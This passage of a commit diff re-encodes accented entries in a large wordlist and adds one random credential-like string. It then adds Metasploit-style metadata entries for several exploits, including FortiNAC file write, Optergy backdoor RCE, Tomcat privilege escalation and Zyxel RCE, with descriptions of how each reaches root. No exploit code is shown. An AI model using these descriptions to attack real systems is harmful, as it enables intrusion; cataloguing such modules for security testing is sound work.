+manèging
 mao
 maoism
 maoist
@@ -47448,7 +47448,7 @@ matimatolo
 matinee
 mating
 matins
-matinée
+matinée
 matisse
 matiwane
 matjeka
@@ -47540,8 +47540,8 @@ matzoh
 matzot
 matzoth
 matzotshweni
-matériel
-matériels
+matériel
+matériels
 mau
 maubane
 maud
@@ -47688,8 +47688,8 @@ mazourka
 mazurka
 mazy
 mazzini
-maître
-mañana
+maître
+mañana
 mb
 mba
 mbabane
@@ -51549,15 +51549,15 @@ mzomusha
 mzonga
 mzonyane
 mzotho
-mélange
-mémoire
-ménage
-métier
-métiers
-mêlée
-mêlées
-möbius
-münchhausen
+mélange
+mémoire
+ménage
+métier
+métiers
+mêlée
+mêlées
+möbius
+münchhausen
 n
 na
 naaco
@@ -51632,8 +51632,8 @@ naive
 naiveness
 naivete
 naivety
-naiveté
-naivetés
+naiveté
+naivetés
 nakamura
 nakayama
 naked
@@ -51939,13 +51939,13 @@ nazca
 nazi
 naziism
 nazism
-naïve
-naïvely
-naïveness
-naïveties
-naïvety
-naïveté
-naïvetés
+naïve
+naïvely
+naïveness
+naïveties
+naïvety
+naïveté
+naïvetés
 nb
 nba
 nbc
@@ -52136,8 +52136,8 @@ negligent
 negligibility
 negligible
 negligibly
-negligée
-negligées
+negligée
+negligées
 negotiability
 negotiable
 negotiant
@@ -54074,10 +54074,10 @@ nouakchott
 nougat
 nought
 noumea
-nouméa
+nouméa
 noun
 nounal
-nounéa
+nounéa
 noupoort
 nourish
 nourished
@@ -54431,10 +54431,10 @@ nzima
 nzimakazi
 nzokhulayo
 nzombane
-nè
-né
-née
-négligé
+nè
+né
+née
+négligé
 o
 oaf
 oafish
@@ -55069,7 +55069,7 @@ olympian
 olympic
 olympie
 olympus
-olé
+olé
 om
 omagh
 omaha
@@ -55933,7 +55933,7 @@ outrigger
 outright
 outrun
 outrunning
-outré
+outré
 outscore
 outsell
 outset
@@ -57060,7 +57060,7 @@ paranoiac
 paranoid
 paranormal
 paranormally
-paraná
+paraná
 parapet
 paraphernalia
 paraphrase
@@ -57357,8 +57357,8 @@ passwd
 password
 password1
 passworded
-passé
-passée
+passé
+passée
 past
 pasta
 paste
@@ -59360,10 +59360,10 @@ pizzazz
 pizzeria
 pizzicati
 pizzicato
-piñata
-piñatas
-piñon
-piñons
+piñata
+piñatas
+piñon
+piñons
 pj
 pk
 pkg
@@ -59854,7 +59854,7 @@ poignancy
 poignant
 poikilothermic
 poincare
-poincaré
+poincaré
 poinciana
 poincianas
 poindexter
@@ -60303,8 +60303,8 @@ portie
 portiere
 porting
 portion
-portière
-portières
+portière
+portières
 portland
 portliness
 portly
@@ -61002,10 +61002,10 @@ premise
 premiss
 premium
 premix
-première
-premièred
-premières
-premièring
+première
+premièred
+premières
+premièring
 premolar
 premonition
 premonitory
@@ -61923,10 +61923,10 @@ protrusively
 protrusiveness
 protuberance
 protuberant
-protégé
-protégée
-protégées
-protégés
+protégé
+protégée
+protégées
+protégés
 proud
 proudhon
 proust
@@ -61946,7 +61946,7 @@ provence
 provender
 provenience
 provenly
-provençal
+provençal
 prover
 proverb
 proverbial
@@ -62019,10 +62019,10 @@ pryce
 pryer
 prying
 pryor
-précis
-précised
-précises
-précising
+précis
+précised
+précises
+précising
 ps
 psalm
 psalmist
@@ -62429,10 +62429,10 @@ purvey
 purveyance
 purveyor
 purview
-purée
-puréed
-puréeing
-purées
+purée
+puréed
+puréeing
+purées
 pus
 pusan
 pusey
@@ -62580,10 +62580,10 @@ pyxidia
 pyxidium
 pyxis
 pzazz
-pâté
-pères
-pétain
-pôrto
+pâté
+pères
+pétain
+pôrto
 q
 q-tips.
 q-town
@@ -63018,6 +63018,7 @@ r1
 r1s
 r4
 r4s
+r50$K28vaIFiYxaY
 ra
 raapkraal
 rab
@@ -63215,7 +63216,7 @@ ragingly
 raglan
 ragnar
 ragnarok
-ragnarök
+ragnarök
 ragout
 rags-to-riches
 ragtag
@@ -64150,7 +64151,7 @@ recharter
 recheck
 recherche
 recherches
-recherché
+recherché
 rechristen
 recidivism
 recidivist
@@ -65462,7 +65463,7 @@ repute
 reputed
 reputes
 reputing
-repêchage
+repêchage
 request
 requested
 requester
@@ -66490,7 +66491,7 @@ risorgimento
 risotto
 rispark
 risque
-risqué
+risqué
 rissole
 rita
 ritalin
@@ -67101,7 +67102,7 @@ rostropovich
 rostrum
 roswell
 rosy
-rosé
+rosé
 rot
 rot-gut
 rota
@@ -67211,8 +67212,8 @@ routinize
 rouvin
 roux
 rouxville
-roué
-roués
+roué
+roués
 rove
 rover
 roving
@@ -67604,13 +67605,13 @@ ryon
 rysmierbult
 ryukyu
 ryun
-régime
-régimes
-résumé
-résumés
-réunion
-rôle
-rôles
+régime
+régimes
+résumé
+résumés
+réunion
+rôle
+rôles
 s
 sa
 saa
@@ -68354,10 +68355,10 @@ saussure
 saute
 sauterne
 sauternes
-sauté
-sautéed
-sautéing
-sautés
+sauté
+sautéed
+sautéing
+sautés
 sauveur
 savable
 savage
@@ -68721,7 +68722,7 @@ schrod
 schrodinger
 schroeder
 schroedinger
-schrödinger
+schrödinger
 schtick
 schubert
 schuinshoogte
@@ -70196,12 +70197,12 @@ seychelles
 seyfert
 seymour
 sezela
-señor
-señora
-señoras
-señores
-señorita
-señoritas
+señor
+señora
+señoras
+señores
+señorita
+señoritas
 sf
 sforzandi
 sforzando
@@ -72452,7 +72453,7 @@ smutting
 smutty
 smyrna
 smythesdale
-smörgåsbord
+smörgåsbord
 sn
 snaaks
 snack
@@ -72823,13 +72824,13 @@ soi
 soi-disant
 soigne
 soignee
-soigné
+soigné
 soil
 soiled
 soiling
 soiree
-soirée
-soirées
+soirée
+soirées
 sojourn
 sojourner
 sojourning
@@ -73126,8 +73127,8 @@ sottish
 sou
 soubriquet
 souffle
-soufflé
-soufflés
+soufflé
+soufflés
 sough
 soughing
 soughs
@@ -73161,8 +73162,8 @@ soup
 soupcon
 souphanouvong
 soupy
-soupçon
-soupçons
+soupçon
+soupçons
 sour
 source
 sourced
@@ -76890,9 +76891,9 @@ szechuan
 szechwan
 szilard
 szymborska
-são
-séance
-séances
+são
+séance
+séances
 t
 t-bone
 t-junction
@@ -77263,7 +77264,7 @@ tannery
 tannest
 tanney
 tannhauser
-tannhäuser
+tannhäuser
 tannie
 tannin
 tanning
@@ -78405,7 +78406,7 @@ thespis
 thessalonian
 thessalonians
 thessaloniki
-thessaloníki
+thessaloníki
 thessaly
 theta
 theunissen
@@ -79406,7 +79407,7 @@ tomorrow
 tompkins
 tomsk
 tomtit
-tomé
+tomé
 ton
 tonal
 tonality
@@ -79700,7 +79701,7 @@ touchstone
 touchwood
 touchy
 touchy-feely
-touché
+touché
 tough
 tough-minded
 toughen
@@ -81328,10 +81329,10 @@ tzarist
 tzatziki
 tzeltal
 tzigane
-tête
-tête-bêche
-tête-à-tête
-tórshavn
+tête
+tête-bêche
+tête-à-tête
+tórshavn
 u
 uar
 uart
@@ -83891,7 +83892,7 @@ valvoline
 valvular
 valvules
 valyland
-valéry
+valéry
 vamoose
 vamp
 vamped
@@ -84138,8 +84139,8 @@ velvet
 velveted
 velveteen
 velvety
-velásquez
-velázquez
+velásquez
+velázquez
 venables
 venal
 venality
@@ -84508,8 +84509,8 @@ victualer
 victualler
 victualling
 vicuna
-vicuña
-vicuñas
+vicuña
+vicuñas
 vida
 vidal
 vide
@@ -84711,7 +84712,7 @@ virulence
 virulent
 virus
 vis
-vis-à-vis
+vis-à-vis
 visa
 visage
 visagiepark
@@ -84938,13 +84939,13 @@ voidness
 voids
 voila
 voile
-voilà
+voilà
 voip
 vol
 vol-au-vent
 vol.
 volapuk
-volapük
+volapük
 volar
 volatile
 volatileness
@@ -87786,7 +87787,7 @@ yankton
 yao
 yaobang
 yaounde
-yaoundé
+yaoundé
 yap
 yapped
 yapping
@@ -88383,15 +88384,15 @@ zymurgy
 zyrtec
 zyuganov
 zzz
-zürich
-Ågar
-Ångström
-éclair
-éclairs
-éclat
-élan
-émigré
-émigrés
-épée
-étude
+zürich
+Ågar
+Ångström
+éclair
+éclairs
+éclat
+élan
+émigré
+émigrés
+épée
+étude
 vagrant
@@ -722,7 +722,7 @@
      "JaGoTu",
      "Spencer McIntyre"
    ],
-    "description": "Add, lookup and delete computer accounts via MS-SAMR. By default\n          standard active directory users can add up to 10 new computers to the\n          domain. Administrative privileges however are required to delete the\n          created accounts.",
+    "description": "Add, lookup and delete computer / machine accounts via MS-SAMR. By default\n          standard active directory users can add up to 10 new computers to the\n          domain. Administrative privileges however are required to delete the\n          created accounts.",
    "references": [
      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py"
    ],
@@ -738,7 +738,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-12-02 16:29:02 +0000",
+    "mod_time": "2023-02-22 19:43:21 +0000",
    "path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
    "is_install_path": true,
    "ref_name": "admin/dcerpc/samr_computer",
@@ -4418,7 +4418,7 @@
    "references": [
      "OSVDB-52048",
      "CVE-2009-0815",
-      "URL-http://secunia.com/advisories/33829/",
+      "URL-http://web.archive.org/web/20090212165636/http://secunia.com:80/advisories/33829/",
      "EDB-8038",
      "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/"
    ],
@@ -4441,7 +4441,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-02-08 14:30:08 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb",
    "is_install_path": true,
    "ref_name": "admin/http/typo3_sa_2009_002",
@@ -5232,7 +5232,8 @@
    "type": "auxiliary",
    "author": [
      "Benjamin Delpy",
-      "Dean Welch"
+      "Dean Welch",
+      "alanfoster"
    ],
    "description": "This module forges a Kerberos ticket",
    "references": [
@@ -5248,7 +5249,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-01-24 13:28:10 +0000",
+    "mod_time": "2023-03-06 12:54:07 +0000",
    "path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/forge_ticket",
@@ -5306,7 +5307,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-01-24 15:12:00 +0000",
+    "mod_time": "2023-03-09 02:09:29 +0000",
    "path": "/modules/auxiliary/admin/kerberos/get_ticket.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/get_ticket",
@@ -5407,7 +5408,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-12-07 23:03:57 +0000",
+    "mod_time": "2023-03-08 16:15:24 +0000",
    "path": "/modules/auxiliary/admin/kerberos/keytab.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/keytab",
@@ -6899,7 +6900,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-03-31 23:53:41 +0000",
    "path": "/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/networking/cisco_dcnm_auth_bypass",
@@ -22395,7 +22396,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-02-16 20:13:31 +0000",
+    "mod_time": "2023-03-09 14:05:12 +0000",
    "path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_secrets_dump",
@@ -23139,6 +23140,91 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/amqp/amqp_login": {
+    "name": "AMQP 0-9-1 Login Check Scanner",
+    "fullname": "auxiliary/scanner/amqp/amqp_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "This module will test AMQP logins on a range of machines and\n          report successful logins.  If you have loaded a database plugin\n          and connected to a database this module will record successful\n          logins and hosts so you can track your access.",
+    "references": [
+      "URL-https://www.rabbitmq.com/amqp-0-9-1-reference.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 5671,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-03-20 16:27:11 +0000",
+    "path": "/modules/auxiliary/scanner/amqp/amqp_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/amqp/amqp_login",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_scanner/amqp/amqp_version": {
+    "name": "AMQP 0-9-1 Version Scanner",
+    "fullname": "auxiliary/scanner/amqp/amqp_version",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Detect AMQP version information.",
+    "references": [
+      "URL-https://www.rabbitmq.com/amqp-0-9-1-reference.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 5671,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-03-20 12:23:16 +0000",
+    "path": "/modules/auxiliary/scanner/amqp/amqp_version.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/amqp/amqp_version",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/backdoor/energizer_duo_detect": {
    "name": "Energizer DUO Trojan Scanner",
    "fullname": "auxiliary/scanner/backdoor/energizer_duo_detect",
@@ -23618,7 +23704,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-06-30 15:12:23 +0000",
+    "mod_time": "2023-02-21 15:47:01 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/petitpotam.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/petitpotam",
@@ -37456,6 +37542,62 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/wowza_streaming_engine_manager_login": {
+    "name": "Wowza Streaming Engine Manager Login Utility",
+    "fullname": "auxiliary/scanner/http/wowza_streaming_engine_manager_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module will attempt to authenticate to Wowza Streaming Engine\n          via Wowza Streaming Engine Manager web interface.",
+    "references": [
+
+    ],
+    "platform": "Linux,OSX,Windows",
+    "arch": "",
+    "rport": 8088,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-03-07 23:42:42 +0000",
+    "path": "/modules/auxiliary/scanner/http/wowza_streaming_engine_manager_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/wowza_streaming_engine_manager_login",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/wp_abandoned_cart_sqli": {
    "name": "Abandoned Cart for WooCommerce SQLi Scanner",
    "fullname": "auxiliary/scanner/http/wp_abandoned_cart_sqli",
@@ -46812,7 +46954,7 @@
      "URL-http://www.quarkslab.com/en-blog+read+13",
      "URL-https://code.google.com/p/creddump/",
      "URL-http://lab.mediaservice.net/code/cachedump.rb",
-      "URL-http://insecurety.net/?p=768",
+      "URL-https://web.archive.org/web/20140207114722/http://insecurety.net/?p=768",
      "URL-http://www.beginningtoseethelight.org/ntsecurity/index.htm",
      "URL-http://www.ntdsxtract.com/downloads/ActiveDirectoryOfflineHashDumpAndForensics.pdf",
      "URL-http://www.passcape.com/index.php?section=blog&cmd=details&id=15",
@@ -46828,7 +46970,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-05-17 17:04:49 +0000",
+    "mod_time": "2023-04-01 05:17:02 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/secretsdump.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/secretsdump",
@@ -48647,7 +48789,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-04-14 17:27:19 +0000",
+    "mod_time": "2023-03-23 21:58:40 +0000",
    "path": "/modules/auxiliary/scanner/ssh/ssh_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_enumusers",
@@ -48735,7 +48877,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-03-17 16:07:31 +0000",
+    "mod_time": "2023-03-13 10:05:22 +0000",
    "path": "/modules/auxiliary/scanner/ssh/ssh_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login",
@@ -55022,7 +55164,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-07-12 17:59:12 +0000",
+    "mod_time": "2023-03-02 17:46:21 +0000",
    "path": "/modules/encoders/php/base64.rb",
    "is_install_path": true,
    "ref_name": "php/base64",
@@ -56099,6 +56241,40 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "encoder_x86/xor_poly": {
+    "name": "XOR POLY Encoder",
+    "fullname": "encoder/x86/xor_poly",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "encoder",
+    "author": [
+      "Arthur RAOUT"
+    ],
+    "description": "An x86 Simple POLY Xor encoding method. using polymorphism Register swapping, and instructions modification",
+    "references": [
+
+    ],
+    "platform": "All",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-03-02 13:08:09 +0000",
+    "path": "/modules/encoders/x86/xor_poly.rb",
+    "is_install_path": true,
+    "ref_name": "x86/xor_poly",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "evasion_windows/applocker_evasion_install_util": {
    "name": "Applocker Evasion - .NET Framework Installation Utility",
    "fullname": "evasion/windows/applocker_evasion_install_util",
@@ -56420,7 +56596,7 @@
    "targets": [
      "Microsoft Windows"
    ],
-    "mod_time": "2018-10-11 17:38:47 +0000",
+    "mod_time": "2023-03-05 14:30:47 +0000",
    "path": "/modules/evasion/windows/windows_defender_js_hta.rb",
    "is_install_path": true,
    "ref_name": "windows/windows_defender_js_hta",
@@ -56551,8 +56727,8 @@
      "CVE-2009-3699",
      "OSVDB-58726",
      "BID-36615",
-      "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825",
-      "URL-http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc"
+      "URL-https://web.archive.org/web/20091013155835/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825",
+      "URL-https://web.archive.org/web/20221204155746/http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc"
    ],
    "platform": "AIX",
    "arch": "",
@@ -56566,7 +56742,7 @@
    "targets": [
      "IBM AIX Version 5.1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-28 18:15:26 +0000",
    "path": "/modules/exploits/aix/rpc_cmsd_opcode21.rb",
    "is_install_path": true,
    "ref_name": "aix/rpc_cmsd_opcode21",
@@ -63216,6 +63392,73 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/fortinac_keyupload_file_write": {
+    "name": "Fortinet FortiNAC keyUpload.jsp arbitrary file write",
+    "fullname": "exploit/linux/http/fortinac_keyupload_file_write",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-02-16",
+    "type": "exploit",
+    "author": [
+      "Gwendal Guégniaud",
+      "Zach Hanley",
+      "jheysel-r7"
+    ],
+    "description": "This module uploads a payload to the /tmp directory in addition to a cron job\n          to /etc/cron.d which executes the payload in the context of the root user.\n\n          The core vulnerability is an arbitrary file write issue in /configWizard/keyUpload.jsp which\n          is accessible remotely and without authentication. When you send the vulnerable\n          endpoint a ZIP file, it will extract an attacker controlled file to a directory\n          of the attackers choice on the target system.\n\n          This issue is exploitable on the following versions of FortiNAC:\n\n          FortiNAC version 9.4 prior to 9.4.1\n          FortiNAC version 9.2 prior to 9.2.6\n          FortiNAC version 9.1 prior to 9.1.8\n          FortiNAC 8.8 all versions\n          FortiNAC 8.7 all versions\n          FortiNAC 8.6 all versions\n          FortiNAC 8.5 all versions\n          FortiNAC 8.3 all versions",
+    "references": [
+      "URL-https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/",
+      "URL-https://www.fortiguard.com/psirt/FG-IR-22-300",
+      "URL-https://github.com/horizon3ai/CVE-2022-39952",
+      "URL-https://attackerkb.com/topics/9BvxYuiHYJ/cve-2022-39952",
+      "CVE-2022-39952"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x64, x86",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "CMD",
+      "Linux x86",
+      "Linux x64"
+    ],
+    "mod_time": "2023-03-13 15:46:42 +0000",
+    "path": "/modules/exploits/linux/http/fortinac_keyupload_file_write.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/fortinac_keyupload_file_write",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/fortinet_authentication_bypass_cve_2022_40684": {
    "name": "Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.",
    "fullname": "exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684",
@@ -67886,6 +68129,73 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/optergy_bms_backdoor_rce_cve_2019_7276": {
+    "name": "Optergy Proton and Enterprise BMS Command Injection using a backdoor",
+    "fullname": "exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-11-05",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Gjoko Krstic <gjoko@applied-risk.com>"
+    ],
+    "description": "This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise\n          Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable.\n          Attackers can exploit this issue by directly navigating to an undocumented backdoor script\n          called Console.jsp in the tools directory and gain full system access.\n          Successful exploitation results in `root` command execution using `sudo` as user `optergy`.",
+    "references": [
+      "CVE-2019-7276",
+      "URL-https://applied-risk.com/resources/ar-2019-008",
+      "URL-https://optergy.com/products/proton/",
+      "URL-https://optergy.com/products/optergy-enterprise/",
+      "URL-https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276",
+      "EDB-47641",
+      "PACKETSTORM-155258"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x64, x86",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-03-26 18:31:25 +0000",
+    "path": "/modules/exploits/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/optergy_bms_backdoor_rce_cve_2019_7276",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/oracle_ebs_rce_cve_2022_21587": {
    "name": "Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload",
    "fullname": "exploit/linux/http/oracle_ebs_rce_cve_2022_21587",
@@ -76600,6 +76910,65 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_linux/local/tomcat_rhel_based_temp_priv_esc": {
+    "name": "Apache Tomcat on RedHat Based Systems Insecure Temp Config Privilege Escalation",
+    "fullname": "exploit/linux/local/tomcat_rhel_based_temp_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2016-10-10",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Dawid Golunski <dawid@legalhackers.com>"
+    ],
+    "description": "This module exploits a vulnerability in RedHat based systems where\n          improper file permissions are applied to /usr/lib/tmpfiles.d/tomcat.conf\n          for Apache Tomcat versions before 7.0.54-8.  This may also work against\n\n          The configuration files in tmpfiles.d are used by systemd-tmpfiles to manage\n          temporary files including their creation.\n\n          With this weak permission, we're able to inject commands into systemd-tmpfiles\n          service to write a cron job to execute our payload.\n\n          systemd-tmpfiles is executed by default on boot on RedHat-based systems\n          through systemd-tmpfiles-setup.service. Depending on the system in use,\n          the execution of systemd-tmpfiles could also be triggered by other\n          services, cronjobs, startup scripts etc.\n\n          This module was tested against Tomcat 7.0.54-3 on Fedora 21.",
+    "references": [
+      "EDB-40488",
+      "URL-https://access.redhat.com/security/cve/CVE-2016-5425",
+      "URL-http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html",
+      "URL-https://www.freedesktop.org/software/systemd/man/tmpfiles.d.html",
+      "CVE-2016-5425"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2023-03-13 14:42:26 +0000",
+    "path": "/modules/exploits/linux/local/tomcat_rhel_based_temp_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/tomcat_rhel_based_temp_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_linux/local/tomcat_ubuntu_log_init_priv_esc": {
    "name": "Apache Tomcat on Ubuntu Log Init Privilege Escalation",
    "fullname": "exploit/linux/local/tomcat_ubuntu_log_init_priv_esc",
@@ -77266,7 +77635,7 @@
    "description": "This module exploits CVE-2022-37393, which is a vulnerability in\n          Zimbra's sudo configuration that permits the zimbra user to execute\n          the zmslapd binary as root with arbitrary parameters. As part of its\n          intended functionality, zmslapd can load a user-defined configuration\n          file, which includes plugins in the form of .so files, which also\n          execute as root.",
    "references": [
      "CVE-2022-37393",
-      "URL-https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/"
+      "URL-https://web.archive.org/web/20221002011602/https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/"
    ],
    "platform": "Linux",
    "arch": "x86, x64",
@@ -77280,7 +77649,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-08-04 08:19:44 +0000",
+    "mod_time": "2023-03-27 16:46:07 +0000",
    "path": "/modules/exploits/linux/local/zimbra_slapper_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/zimbra_slapper_priv_esc",
@@ -79144,6 +79513,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/misc/zyxel_multiple_devices_zhttp_lan_rce": {
+    "name": "Zyxel Unauthenticated LAN Remote Code Execution",
+    "fullname": "exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2022-02-01",
+    "type": "exploit",
+    "author": [
+      "Steffen Robertz <s.robertz@sec-consult.com>",
+      "Gerhard Hechenberger <g.hechenberger@sec-consult.com>",
+      "Thomas Weber <t.weber@sec-consult.com>",
+      "Stefan Viehboeck <v.viehboeck@sec-consult.com>",
+      "SEC Consult Vulnerability Lab"
+    ],
+    "description": "This module exploits a buffer overflow in the zhttpd binary (/bin/zhttpd). It is present on more than 40 Zyxel routers and CPE devices.\n          The code execution vulnerability can only be exploited by an attacker if the zhttp webserver is reachable.\n          No authentication is required. After exploitation, an attacker will be able to execute any command\n          as root, including downloading and executing a binary from another host.",
+    "references": [
+      "URL-https://r.sec-consult.com/zyxsploit"
+    ],
+    "platform": "Linux",
+    "arch": "armle",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Zyxel Device"
+    ],
+    "mod_time": "2023-03-21 14:26:05 +0000",
+    "path": "/modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/misc/zyxel_multiple_devices_zhttp_lan_rce",
+    "check": true,
